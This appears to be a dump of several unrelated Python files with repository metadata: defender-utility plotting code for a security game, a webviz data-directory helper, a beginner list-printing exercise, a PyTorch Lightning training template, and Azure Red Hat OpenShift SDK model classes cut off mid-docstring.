S2.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 4 V3_URS = [] V3_OPT = [] V3_MMP = [] for i in range(len(strategies)): V3_URS.append(strategies[i][0][3]) V3_OPT.append(strategies[i][1][3]) V3_MMP.append(strategies[i][2][3]) plt.plot(gamma, np.asarray(V3_URS), marker='o') plt.plot(gamma, np.asarray(V3_OPT), marker='x') plt.plot(gamma, np.asarray(V3_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S3.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 5 V4_URS = [] V4_OPT = [] V4_MMP = [] for i in range(len(strategies)): V4_URS.append(strategies[i][0][4]) V4_OPT.append(strategies[i][1][4]) V4_MMP.append(strategies[i][2][4]) plt.plot(gamma, np.asarray(V4_URS), marker='o') plt.plot(gamma, np.asarray(V4_OPT), marker='x') plt.plot(gamma, np.asarray(V4_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S4.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 6 V5_URS = [] V5_OPT = [] V5_MMP = [] for i in range(len(strategies)): V5_URS.append(strategies[i][0][5]) V5_OPT.append(strategies[i][1][5]) V5_MMP.append(strategies[i][2][5]) plt.plot(gamma, np.asarray(V5_URS), marker='o') plt.plot(gamma, np.asarray(V5_OPT), marker='x') plt.plot(gamma, np.asarray(V5_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S5.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 7 V6_URS = [] V6_OPT = [] V6_MMP = [] for i in range(len(strategies)): V6_URS.append(strategies[i][0][6]) V6_OPT.append(strategies[i][1][6]) V6_MMP.append(strategies[i][2][6]) plt.plot(gamma, np.asarray(V6_URS), marker='o') plt.plot(gamma, np.asarray(V6_OPT), marker='x') plt.plot(gamma, np.asarray(V6_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S6.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 8 V7_URS = [] V7_OPT = [] V7_MMP = [] for i in range(len(strategies)): V7_URS.append(strategies[i][0][7]) V7_OPT.append(strategies[i][1][7]) V7_MMP.append(strategies[i][2][7]) plt.plot(gamma, np.asarray(V7_URS), marker='o') plt.plot(gamma, np.asarray(V7_OPT), marker='x') plt.plot(gamma, np.asarray(V7_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S7.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 9 V8_URS = [] V8_OPT = [] V8_MMP = [] for i in range(len(strategies)): V8_URS.append(strategies[i][0][8]) V8_OPT.append(strategies[i][1][8]) V8_MMP.append(strategies[i][2][8]) plt.plot(gamma, np.asarray(V8_URS), marker='o') plt.plot(gamma, np.asarray(V8_OPT), marker='x') plt.plot(gamma, np.asarray(V8_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S8.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show() #Plot 10 V9_URS = [] V9_OPT = [] V9_MMP = [] for i in range(len(strategies)): V9_URS.append(strategies[i][0][9]) V9_OPT.append(strategies[i][1][9]) V9_MMP.append(strategies[i][2][9]) plt.plot(gamma, np.asarray(V9_URS), marker='o') plt.plot(gamma, np.asarray(V9_OPT), marker='x') plt.plot(gamma, np.asarray(V9_MMP), marker='+') plt.ylabel("Defender's Utility $\longrightarrow$") plt.xlabel("$\gamma \longrightarrow$") plt.title("Defender's value in state S9.") plt.legend(['Uniform Random Strategy', 'Optimal Mixed Strategy', 'Min Max Pure Strategy'], loc='lower left') plt.show()
41.47138
218
0.697735
0b1ccb2de9b985f25357a45fe5fd16e2eab72b61
400
py
Python
webviz_config/_user_data_dir.py
ivarbje/webviz-config
d1096789e1b0354dbef44555ab79c8a88dbc837c
[ "MIT" ]
null
null
null
webviz_config/_user_data_dir.py
ivarbje/webviz-config
d1096789e1b0354dbef44555ab79c8a88dbc837c
[ "MIT" ]
null
null
null
webviz_config/_user_data_dir.py
ivarbje/webviz-config
d1096789e1b0354dbef44555ab79c8a88dbc837c
[ "MIT" ]
null
null
null
import sys from pathlib import Path def user_data_dir() -> Path: """Returns platform specific path to store user application data """ if sys.platform == "win32": return Path.home() / "Application Data" / "webviz" if sys.platform == "darwin": return Path.home() / "Library" / "Application Support" / "webviz" return Path.home() / ".local" / "share" / "webviz"
25
73
0.625
6185316b5d2f45e7cbe31bea0d25e1e49b81ab73
1,000
py
Python
ch01-05/04_01-magicians.py
remotephone/pythoncrashcourse
837d05c5ef4976621bd2206328254749a71d60ff
[ "Apache-2.0" ]
null
null
null
ch01-05/04_01-magicians.py
remotephone/pythoncrashcourse
837d05c5ef4976621bd2206328254749a71d60ff
[ "Apache-2.0" ]
null
null
null
ch01-05/04_01-magicians.py
remotephone/pythoncrashcourse
837d05c5ef4976621bd2206328254749a71d60ff
[ "Apache-2.0" ]
null
null
null
magicians = ['alice', 'david', 'carolina'] for magician in magicians: print(magician) print("\n====================") magicians = ['alice', 'david', 'carolina'] for magician in magicians: print(magician.title() + ", that was a great trick!") print("I can't wait to see your next trick, " + magician.title() + ".\n") print("Thank you everyone, that was a great show!") print("\n====================\n") print ("""This is improperly formatted code:\n magicians = ['alice', 'david', 'carolina'] for magician in magicians: print(magician)\n It should look like this:\n magicians = ['alice', 'david', 'carolina'] for magician in magicians: print(magician)\n """) print("Now for pizza stuff") pizza = ['pepperoni', 'cheese', 'olive'] for za in pizza: print("I like " + za + " pizza.") print("I really like pizza!\n") print("Now for animals") animals = ['dog', 'cat', 'snek'] for animal in animals: print("I would like to boop a " + animal + ".") print("That would be nice")
26.315789
77
0.624
c4def8a81d6b41d37f98fbb832fa1925efbaee35
1,108
py
Python
base_scripts/base_train.py
tugot17/Pytorch-Lightning-Templates-
36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8
[ "MIT" ]
2
2020-11-04T19:14:51.000Z
2021-03-04T13:14:17.000Z
base_scripts/base_train.py
tugot17/Pytorch-Lightning-Templates-
36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8
[ "MIT" ]
null
null
null
base_scripts/base_train.py
tugot17/Pytorch-Lightning-Templates-
36ec7ac8f1699e4e266f0d4f08df67a2873ba0f8
[ "MIT" ]
null
null
null
import os import pytorch_lightning as pl from pytorch_lightning import Trainer from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.callbacks.early_stopping import EarlyStopping from pytorch_lightning.loggers import WandbLogger if __name__ == "__main__": dm = ... model = ... # Fast run first trainer = Trainer( gpus=1, fast_dev_run=True, checkpoint_callback=False, logger=False ) checkpoint_callback = ModelCheckpoint( filepath=os.getcwd(), save_top_k=2, verbose=True, monitor="val/loss", mode="min", ) experiment_name = ... PROJECT_NAME = ... logger = WandbLogger(name=experiment_name, project=PROJECT_NAME) # And then actual training pl.seed_everything(42) trainer = Trainer( max_epochs=40, logger=logger, gpus=1, # precision=16, deterministic=True, accumulate_grad_batches=2, callbacks=[EarlyStopping(monitor="val/loss")], # resume_from_checkpoint = 'my_checkpoint.ckpt' ) trainer.fit(model, dm)
23.574468
74
0.665162
2b203a81f5958cf91c95e1e090a7eda9bbff514f
29,527
py
Python
python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py
Thanonchai/ARO-RP
823d357376c6c1ce38ce026acadca6103a0fe2c9
[ "Apache-2.0" ]
null
null
null
python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py
Thanonchai/ARO-RP
823d357376c6c1ce38ce026acadca6103a0fe2c9
[ "Apache-2.0" ]
1
2021-01-22T16:19:04.000Z
2021-01-22T16:19:04.000Z
python/client/azure/mgmt/redhatopenshift/v2021_01_31_preview/models/_models_py3.py
troy0820/ARO-RP
32dff228210270a02dcd2a66d8c642da53c4e120
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft and contributors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # limitations under the License. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model from msrest.exceptions import HttpOperationError class APIServerProfile(Model): """APIServerProfile represents an API server profile. :param visibility: API server visibility. Possible values include: 'Private', 'Public' :type visibility: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum :param url: The URL to access the cluster API server. :type url: str :param ip: The IP of the cluster API server. :type ip: str """ _attribute_map = { 'visibility': {'key': 'visibility', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'}, 'ip': {'key': 'ip', 'type': 'str'}, } def __init__(self, *, visibility=None, url: str=None, ip: str=None, **kwargs) -> None: super(APIServerProfile, self).__init__(**kwargs) self.visibility = visibility self.url = url self.ip = ip class Resource(Model): """Common fields that are returned in the response for all Azure Resource Manager resources. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName} :vartype id: str :ivar name: The name of the resource :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" :vartype type: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__(self, **kwargs) -> None: super(Resource, self).__init__(**kwargs) self.id = None self.name = None self.type = None class AzureEntityResource(Resource): """The resource model definition for an Azure Resource Manager resource with an etag. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName} :vartype id: str :ivar name: The name of the resource :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" :vartype type: str :ivar etag: Resource Etag. :vartype etag: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'etag': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'etag': {'key': 'etag', 'type': 'str'}, } def __init__(self, **kwargs) -> None: super(AzureEntityResource, self).__init__(**kwargs) self.etag = None class CloudError(Model): """CloudError represents a cloud error. :param error: An error response from the service. :type error: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CloudErrorBody """ _attribute_map = { 'error': {'key': 'error', 'type': 'CloudErrorBody'}, } def __init__(self, *, error=None, **kwargs) -> None: super(CloudError, self).__init__(**kwargs) self.error = error class CloudErrorException(HttpOperationError): """Server responsed with exception of type: 'CloudError'. :param deserialize: A deserializer :param response: Server response to be deserialized. """ def __init__(self, deserialize, response, *args): super(CloudErrorException, self).__init__(deserialize, response, 'CloudError', *args) class CloudErrorBody(Model): """CloudErrorBody represents the body of a cloud error. :param code: An identifier for the error. Codes are invariant and are intended to be consumed programmatically. :type code: str :param message: A message describing the error, intended to be suitable for display in a user interface. :type message: str :param target: The target of the particular error. For example, the name of the property in error. :type target: str :param details: A list of additional details about the error. :type details: list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CloudErrorBody] """ _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, 'details': {'key': 'details', 'type': '[CloudErrorBody]'}, } def __init__(self, *, code: str=None, message: str=None, target: str=None, details=None, **kwargs) -> None: super(CloudErrorBody, self).__init__(**kwargs) self.code = code self.message = message self.target = target self.details = details class ClusterProfile(Model): """ClusterProfile represents a cluster profile. :param pull_secret: The pull secret for the cluster. :type pull_secret: str :param domain: The domain for the cluster. :type domain: str :param version: The version of the cluster. :type version: str :param resource_group_id: The ID of the cluster resource group. :type resource_group_id: str """ _attribute_map = { 'pull_secret': {'key': 'pullSecret', 'type': 'str'}, 'domain': {'key': 'domain', 'type': 'str'}, 'version': {'key': 'version', 'type': 'str'}, 'resource_group_id': {'key': 'resourceGroupId', 'type': 'str'}, } def __init__(self, *, pull_secret: str=None, domain: str=None, version: str=None, resource_group_id: str=None, **kwargs) -> None: super(ClusterProfile, self).__init__(**kwargs) self.pull_secret = pull_secret self.domain = domain self.version = version self.resource_group_id = resource_group_id class ConsoleProfile(Model): """ConsoleProfile represents a console profile. :param url: The URL to access the cluster console. :type url: str """ _attribute_map = { 'url': {'key': 'url', 'type': 'str'}, } def __init__(self, *, url: str=None, **kwargs) -> None: super(ConsoleProfile, self).__init__(**kwargs) self.url = url class Display(Model): """Display represents the display details of an operation. :param provider: Friendly name of the resource provider. :type provider: str :param resource: Resource type on which the operation is performed. :type resource: str :param operation: Operation type: read, write, delete, listKeys/action, etc. :type operation: str :param description: Friendly name of the operation. :type description: str """ _attribute_map = { 'provider': {'key': 'provider', 'type': 'str'}, 'resource': {'key': 'resource', 'type': 'str'}, 'operation': {'key': 'operation', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, } def __init__(self, *, provider: str=None, resource: str=None, operation: str=None, description: str=None, **kwargs) -> None: super(Display, self).__init__(**kwargs) self.provider = provider self.resource = resource self.operation = operation self.description = description class IngressProfile(Model): """IngressProfile represents an ingress profile. :param name: The ingress profile name. :type name: str :param visibility: Ingress visibility. Possible values include: 'Private', 'Public' :type visibility: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum :param ip: The IP of the ingress. :type ip: str """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'visibility': {'key': 'visibility', 'type': 'str'}, 'ip': {'key': 'ip', 'type': 'str'}, } def __init__(self, *, name: str=None, visibility=None, ip: str=None, **kwargs) -> None: super(IngressProfile, self).__init__(**kwargs) self.name = name self.visibility = visibility self.ip = ip class MasterProfile(Model): """MasterProfile represents a master profile. :param vm_size: The size of the master VMs. Possible values include: 'Standard_D16as_v4', 'Standard_D16s_v3', 'Standard_D2s_v3', 'Standard_D32as_v4', 'Standard_D32s_v3', 'Standard_D4as_v4', 'Standard_D4s_v3', 'Standard_D8as_v4', 'Standard_D8s_v3', 'Standard_E16s_v3', 'Standard_E32s_v3', 'Standard_E4s_v3', 'Standard_E64i_v3', 'Standard_E64is_v3', 'Standard_E8s_v3', 'Standard_F16s_v2', 'Standard_F32s_v2', 'Standard_F4s_v2', 'Standard_F72s_v2', 'Standard_F8s_v2', 'Standard_G5', 'Standard_GS5', 'Standard_M128ms' :type vm_size: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.VMSize :param subnet_id: The Azure resource ID of the master subnet. :type subnet_id: str """ _attribute_map = { 'vm_size': {'key': 'vmSize', 'type': 'str'}, 'subnet_id': {'key': 'subnetId', 'type': 'str'}, } def __init__(self, *, vm_size=None, subnet_id: str=None, **kwargs) -> None: super(MasterProfile, self).__init__(**kwargs) self.vm_size = vm_size self.subnet_id = subnet_id class NetworkProfile(Model): """NetworkProfile represents a network profile. :param pod_cidr: The CIDR used for OpenShift/Kubernetes Pods. :type pod_cidr: str :param service_cidr: The CIDR used for OpenShift/Kubernetes Services. :type service_cidr: str """ _attribute_map = { 'pod_cidr': {'key': 'podCidr', 'type': 'str'}, 'service_cidr': {'key': 'serviceCidr', 'type': 'str'}, } def __init__(self, *, pod_cidr: str=None, service_cidr: str=None, **kwargs) -> None: super(NetworkProfile, self).__init__(**kwargs) self.pod_cidr = pod_cidr self.service_cidr = service_cidr class TrackedResource(Resource): """The resource model definition for an Azure Resource Manager tracked top level resource. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName} :vartype id: str :ivar name: The name of the resource :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" :vartype type: str :param tags: Resource tags. :type tags: dict[str, str] :param location: Required. The geo-location where the resource lives :type location: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'location': {'required': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'location': {'key': 'location', 'type': 'str'}, } def __init__(self, *, location: str, tags=None, **kwargs) -> None: super(TrackedResource, self).__init__(**kwargs) self.tags = tags self.location = location class OpenShiftCluster(TrackedResource): """OpenShiftCluster represents an Azure Red Hat OpenShift cluster. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName} :vartype id: str :ivar name: The name of the resource :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" :vartype type: str :param tags: Resource tags. :type tags: dict[str, str] :param location: Required. The geo-location where the resource lives :type location: str :param provisioning_state: The cluster provisioning state. Possible values include: 'AdminUpdating', 'Creating', 'Deleting', 'Failed', 'Succeeded', 'Updating' :type provisioning_state: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum :param cluster_profile: The cluster profile. :type cluster_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ClusterProfile :param console_profile: The console profile. :type console_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ConsoleProfile :param service_principal_profile: The cluster service principal profile. :type service_principal_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ServicePrincipalProfile :param network_profile: The cluster network profile. :type network_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.NetworkProfile :param master_profile: The cluster master profile. :type master_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.MasterProfile :param worker_profiles: The cluster worker profiles. :type worker_profiles: list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.WorkerProfile] :param apiserver_profile: The cluster API server profile. :type apiserver_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.APIServerProfile :param ingress_profiles: The cluster ingress profiles. :type ingress_profiles: list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.IngressProfile] :ivar system_data: The system meta data relating to this resource. :vartype system_data: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.SystemData """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'location': {'required': True}, 'system_data': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'location': {'key': 'location', 'type': 'str'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'cluster_profile': {'key': 'properties.clusterProfile', 'type': 'ClusterProfile'}, 'console_profile': {'key': 'properties.consoleProfile', 'type': 'ConsoleProfile'}, 'service_principal_profile': {'key': 'properties.servicePrincipalProfile', 'type': 'ServicePrincipalProfile'}, 'network_profile': {'key': 'properties.networkProfile', 'type': 'NetworkProfile'}, 'master_profile': {'key': 'properties.masterProfile', 'type': 'MasterProfile'}, 'worker_profiles': {'key': 'properties.workerProfiles', 'type': '[WorkerProfile]'}, 'apiserver_profile': {'key': 'properties.apiserverProfile', 'type': 'APIServerProfile'}, 'ingress_profiles': {'key': 'properties.ingressProfiles', 'type': '[IngressProfile]'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, } def __init__(self, *, location: str, tags=None, provisioning_state=None, cluster_profile=None, console_profile=None, service_principal_profile=None, network_profile=None, master_profile=None, worker_profiles=None, apiserver_profile=None, ingress_profiles=None, **kwargs) -> None: super(OpenShiftCluster, self).__init__(tags=tags, location=location, **kwargs) self.provisioning_state = provisioning_state self.cluster_profile = cluster_profile self.console_profile = console_profile self.service_principal_profile = service_principal_profile self.network_profile = network_profile self.master_profile = master_profile self.worker_profiles = worker_profiles self.apiserver_profile = apiserver_profile self.ingress_profiles = ingress_profiles self.system_data = None class OpenShiftClusterAdminKubeconfig(Model): """OpenShiftClusterAdminKubeconfig represents an OpenShift cluster's admin kubeconfig. :param kubeconfig: The base64-encoded kubeconfig file. :type kubeconfig: str """ _attribute_map = { 'kubeconfig': {'key': 'kubeconfig', 'type': 'str'}, } def __init__(self, *, kubeconfig: str=None, **kwargs) -> None: super(OpenShiftClusterAdminKubeconfig, self).__init__(**kwargs) self.kubeconfig = kubeconfig class OpenShiftClusterCredentials(Model): """OpenShiftClusterCredentials represents an OpenShift cluster's credentials. :param kubeadmin_username: The username for the kubeadmin user. :type kubeadmin_username: str :param kubeadmin_password: The password for the kubeadmin user. :type kubeadmin_password: str """ _attribute_map = { 'kubeadmin_username': {'key': 'kubeadminUsername', 'type': 'str'}, 'kubeadmin_password': {'key': 'kubeadminPassword', 'type': 'str'}, } def __init__(self, *, kubeadmin_username: str=None, kubeadmin_password: str=None, **kwargs) -> None: super(OpenShiftClusterCredentials, self).__init__(**kwargs) self.kubeadmin_username = kubeadmin_username self.kubeadmin_password = kubeadmin_password class OpenShiftClusterUpdate(Model): """OpenShiftCluster represents an Azure Red Hat OpenShift cluster. Variables are only populated by the server, and will be ignored when sending a request. :param tags: The resource tags. :type tags: dict[str, str] :param provisioning_state: The cluster provisioning state. Possible values include: 'AdminUpdating', 'Creating', 'Deleting', 'Failed', 'Succeeded', 'Updating' :type provisioning_state: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum :param cluster_profile: The cluster profile. :type cluster_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ClusterProfile :param console_profile: The console profile. :type console_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ConsoleProfile :param service_principal_profile: The cluster service principal profile. :type service_principal_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ServicePrincipalProfile :param network_profile: The cluster network profile. :type network_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.NetworkProfile :param master_profile: The cluster master profile. :type master_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.MasterProfile :param worker_profiles: The cluster worker profiles. :type worker_profiles: list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.WorkerProfile] :param apiserver_profile: The cluster API server profile. :type apiserver_profile: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.APIServerProfile :param ingress_profiles: The cluster ingress profiles. :type ingress_profiles: list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.IngressProfile] :ivar system_data: The system meta data relating to this resource. :vartype system_data: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.SystemData """ _validation = { 'system_data': {'readonly': True}, } _attribute_map = { 'tags': {'key': 'tags', 'type': '{str}'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'cluster_profile': {'key': 'properties.clusterProfile', 'type': 'ClusterProfile'}, 'console_profile': {'key': 'properties.consoleProfile', 'type': 'ConsoleProfile'}, 'service_principal_profile': {'key': 'properties.servicePrincipalProfile', 'type': 'ServicePrincipalProfile'}, 'network_profile': {'key': 'properties.networkProfile', 'type': 'NetworkProfile'}, 'master_profile': {'key': 'properties.masterProfile', 'type': 'MasterProfile'}, 'worker_profiles': {'key': 'properties.workerProfiles', 'type': '[WorkerProfile]'}, 'apiserver_profile': {'key': 'properties.apiserverProfile', 'type': 'APIServerProfile'}, 'ingress_profiles': {'key': 'properties.ingressProfiles', 'type': '[IngressProfile]'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, } def __init__(self, *, tags=None, provisioning_state=None, cluster_profile=None, console_profile=None, service_principal_profile=None, network_profile=None, master_profile=None, worker_profiles=None, apiserver_profile=None, ingress_profiles=None, **kwargs) -> None: super(OpenShiftClusterUpdate, self).__init__(**kwargs) self.tags = tags self.provisioning_state = provisioning_state self.cluster_profile = cluster_profile self.console_profile = console_profile self.service_principal_profile = service_principal_profile self.network_profile = network_profile self.master_profile = master_profile self.worker_profiles = worker_profiles self.apiserver_profile = apiserver_profile self.ingress_profiles = ingress_profiles self.system_data = None class Operation(Model): """Operation represents an RP operation. :param name: Operation name: {provider}/{resource}/{operation}. :type name: str :param display: The object that describes the operation. :type display: ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.Display :param origin: Sources of requests to this operation. Comma separated list with valid values user or system, e.g. "user,system". :type origin: str """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display': {'key': 'display', 'type': 'Display'}, 'origin': {'key': 'origin', 'type': 'str'}, } def __init__(self, *, name: str=None, display=None, origin: str=None, **kwargs) -> None: super(Operation, self).__init__(**kwargs) self.name = name self.display = display self.origin = origin class ProxyResource(Resource): """The resource model definition for an Azure Resource Manager proxy resource. It will have everything other than required location and tags. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName} :vartype id: str :ivar name: The name of the resource :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" :vartype type: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__(self, **kwargs) -> None: super(ProxyResource, self).__init__(**kwargs) class ServicePrincipalProfile(Model): """ServicePrincipalProfile represents a service principal profile. :param client_id: The client ID used for the cluster. :type client_id: str :param client_secret: The client secret used for the cluster. :type client_secret: str """ _attribute_map = { 'client_id': {'key': 'clientId', 'type': 'str'}, 'client_secret': {'key': 'clientSecret', 'type': 'str'}, } def __init__(self, *, client_id: str=None, client_secret: str=None, **kwargs) -> None: super(ServicePrincipalProfile, self).__init__(**kwargs) self.client_id = client_id self.client_secret = client_secret class SystemData(Model): """Metadata pertaining to creation and last modification of the resource. :param created_by: The identity that created the resource. :type created_by: str :param created_by_type: The type of identity that created the resource. Possible values include: 'User', 'Application', 'ManagedIdentity', 'Key' :type created_by_type: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CreatedByType :param created_at: The timestamp of resource creation (UTC). :type created_at: datetime :param last_modified_by: The identity that last modified the resource. :type last_modified_by: str :param last_modified_by_type: The type of identity that last modified the resource. Possible values include: 'User', 'Application', 'ManagedIdentity', 'Key' :type last_modified_by_type: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CreatedByType :param last_modified_at: The type of identity that last modified the resource. :type last_modified_at: datetime """ _attribute_map = { 'created_by': {'key': 'createdBy', 'type': 'str'}, 'created_by_type': {'key': 'createdByType', 'type': 'str'}, 'created_at': {'key': 'createdAt', 'type': 'iso-8601'}, 'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'}, 'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'}, 'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'}, } def __init__(self, *, created_by: str=None, created_by_type=None, created_at=None, last_modified_by: str=None, last_modified_by_type=None, last_modified_at=None, **kwargs) -> None: super(SystemData, self).__init__(**kwargs) self.created_by = created_by self.created_by_type = created_by_type self.created_at = created_at self.last_modified_by = last_modified_by self.last_modified_by_type = last_modified_by_type self.last_modified_at = last_modified_at class WorkerProfile(Model): """WorkerProfile represents a worker profile. :param name: The worker profile name. :type name: str :param vm_size: The size of the worker VMs. Possible values include: 'Standard_D16as_v4', 'Standard_D16s_v3', 'Standard_D2s_v3', 'Standard_D32as_v4', 'Standard_D32s_v3', 'Standard_D4as_v4', 'Standard_D4s_v3', 'Standard_D8as_v4', 'Standard_D8s_v3', 'Standard_E16s_v3', 'Standard_E32s_v3', 'Standard_E4s_v3', 'Standard_E64i_v3', 'Standard_E64is_v3', 'Standard_E8s_v3', 'Standard_F16s_v2', 'Standard_F32s_v2', 'Standard_F4s_v2', 'Standard_F72s_v2', 'Standard_F8s_v2', 'Standard_G5', 'Standard_GS5', 'Standard_M128ms' :type vm_size: str or ~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.VMSize :param 